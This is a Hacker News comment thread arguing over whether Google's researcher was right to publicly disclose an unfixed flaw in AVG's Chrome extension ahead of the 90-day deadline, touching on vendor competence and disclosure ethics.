Hacker News new | past | comments | ask | show | jobs | submit login

If I had to guess: because at this point it's obvious that they have no idea what they're doing and will struggle to not just fix it, but maintain the level of quality needed to keep it that way.



Then tell AVG that. I've seen plenty of bugs where the original fix didn't fix everything, and the reporter explains why, and then they wait for another response. Here they didn't even keep the 90-day deadline.


> I've seen plenty of bugs where the original fix didn't fix everything

You're right, but plenty of bugs aren't for a browser extension that is supposed to enhance the user's security when browsing the internet. The initial fix appeared to show a complete lack of understanding of basic web security.

If you and an intelligent coworker have an agreement to review each other's code on commit, and that coworker responds to a valid complaint about what they've written with something that's probably lifted off of the first StackOverflow post they searched for that addresses the literal value of the complaint without actually solving the problem, you'd probably be a bit peeved that they're not doing their job. Here, the Chrome developers are just showing frustration at AVG's apparent lack of basic skill.


Frustration is fine. I'd even be fine if they banned AVG. But revealing a 0-day publicly without giving time to respond is worse, and is also not in line with Google's policies as I understand.

Many security bugs are for things that one might think are basic after hearing about them, and that shouldn't make it right to 0-day them.

edit: why would revealing a vulnerability to the world before it's been fixed be the right response to incompetence on the part of the vendor?


Regardless of policy it was the right thing to do.


Do you think 0-days should be reported as soon as they're found if the vendor is incompetent? If yes, what's the argument, if not, why is this different?


When you find critical vulnerabilities in popular antivirus software, you can establish a 90 day publishing schedule, or a requirement not to publish until all related vulnerabilities are fixed, or whatever other policy you deem sensible.

Tavis Ormandy is one of the best known vulnerability researchers in the world; whatever publishing decision he and his team made, I think they probably put more thought into it than any combination of the comments on this HN thread did.


It sounds like you're saying he's above criticism for some reason related to fame? That doesn't make sense to me.

If there are details I don't know about that explain it, fine (but it doesn't look like that from what I do see) but arguments over ethics shouldn't be won by appealing to authority.

I might place more stock in your point here if he'd actually given a reason and acknowledge that he's opening up users to exploits, and say it's worth it because of X. As is it doesn't look thought out at all.


I'm suggesting that the implication you're generating all over this thread that (a) there are hard-and-fast rules for disclosure and (b) Tavis Ormandy has somehow broken them is probably built on something other than firsthand knowledge of how vulnerability research works --- to say nothing of firsthand knowledge of how this particular vulnerability was handled.


Google does have a policy not to release within 90 days unless a patch is released, and this does seem to be pointing out a vulnerability that hasn't been patched. What am I getting wrong? Am I misunderstanding something?

Separately, even if they had no such policy or it was an independent researcher, I don't think discussing the ethics of disclosure should be off bounds by someone not directly involved.


If the vendor is incompetent and the bug is being actively exploited, then it's reasonable to violate the 90-day policy, which is designed in the spirit of cooperation with competent vendors.

6 months ago they decided to limit inline installations [1] and they probably started reviewing poorly-rated add-ons like this one at that time.

http://blog.chromium.org/2015/08/protecting-users-from-decep...


There's no indication that the bug was being actively exploited.

Anyway, it's not clear what benefit was had over releasing the report but without the XSS link. Maybe even say "there's XSS on your site" but don't mention the exact link.

Again, they should ban the extension completely if they think it's insecure, and if they haven't done that, they shouldn't be publicizing exploits.


Tavis Ormandy started tweeting at AVG about this subject several months ago.

And it's been pointed out that they aren't able to remove the extension from users' machines due to how it bypasses the Chrome security system. So their best bet was to ask AVG to do the right thing. AVG won't or can't.

So, what can Google do? Just silently accept it? The 90-day policy is worthless in this case.


I went back through his tweets to 2014, searched AVG, and found nothing before Oct, and that wasn't a request for contact, which came in December.

The report is dated from this month.

Re removing it: they can remove it from the webstore. As long as it's in the webstore, they shouldn't be releasing 0-days that haven't been patched yet.


You expended a lot of effort on what could have been easily resolved by asking me. The XSS that you're concerned about was for illustrative purposes only, and could not be used in an attack due to mixed-content errors.

I don't really want to discuss disclosure ethics with you, but will say that our documented policy was followed to the letter.


Yes. 90-day windows are for us, not for companies/projects/teams. They are an acknowledgement that the producer of the software is best suited to patch and get that update to users. If they aren't suited for the task notifying users that they are at risk is the right thing to do.


Out of the following two outcomes:

1. Tell the company, maybe it takes another week to get it fully fixed 2. Tell users, most of whom will never hear about it, while hackers will

The first still seems better. As long as Google isn't pulling the extension and uninstalling it from all chrome users, it seems like disclosure is only hurting most users.


That is a perfectly respectable and intellectually coherent rationale for not disclosing bugs you find prior to the availability of their patches.

However, on the off chance that you are somehow (despite it being 2015) new to the Great Disclosure Debate, you should be aware that there are other respectable and intellectually coherent rationales for other disclosure schedules, and that you are vanishingly unlikely to be the Internet Message Board Commenter That The Prophets Foretold Would Resolve The Disclosure Debate.

So while it's one thing to use this incident to give voice to your own reasoning about how disclosure should be handled, it's another thing entirely to moralize about it --- in this case, repetitively --- with a tone suggesting that the debate has somehow been settled, and you've somehow found out about that before the rest of us.

Your opinions about vulnerability research also get a lot more interesting if you can tell us about your own VR/xdev experience. Because, like it or not, and I know from your comments thus far that you do not like this, if Tavis Ormandy said "new rule: you can disclose 15 seconds after discovery, patch or no patch, so long as you yourself are wearing a pirate eye patch with a large googly eye glued to it", a pretty big swath of the security research community would accept that as The New Rule.


Um, I'm not considering it settled.

I think that this violates Google's stated policy, or at least would like an explanation of why it doesn't. I think that publicizing against your own policy may be worse than publicizing independently.

Is your only problem my tone? And do you think the point about Google's policy is entirely moot, and if so, why?

Re disclosure debate: In this specific instance it seems like it either would have been fixed relatively soon with an audit, or it would not have been fixed and Google would need to remove it from their store. Given that the person making the choice to publicize also has the power to "patch" it by getting Google to ban the extension, the specific choice they made doesn't make sense to me. Either publicize and leave out the unfixed detail, or ban it, then publicize.

As a chrome user, I have the right to be annoyed that Google would disclose an issue with an extension on their store, without giving enough time to fix it nor banning the extension. That makes it different from other instances of disclosure, and to my mind shifts the balance closer to not disclosing.


I think you should take this to @thegrugq on Twitter. He's like Judge Wapner for stuff like this. He'll know what to do.


Regarding tone: several of my "shoulds" were implicitly "if they follow their own policy, then they should". If that wasn't clear, then my comments may have sounded more confident than warranted, although even that implication still seems like a valid position to take.

Edit: also, my argument that it hurts users is also presuming that full disclosure hurts users, which is what Google believes, which is why they have the 90 day policy.


If they manage to keep XSS vulnerabilities off of the pages on their domain(s) for longer than a year I'll be very surprised.

Personally speaking, I'd rather know. If it's a piece of security software it's reasonable to assume the bad guys are already looking at it or using it.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: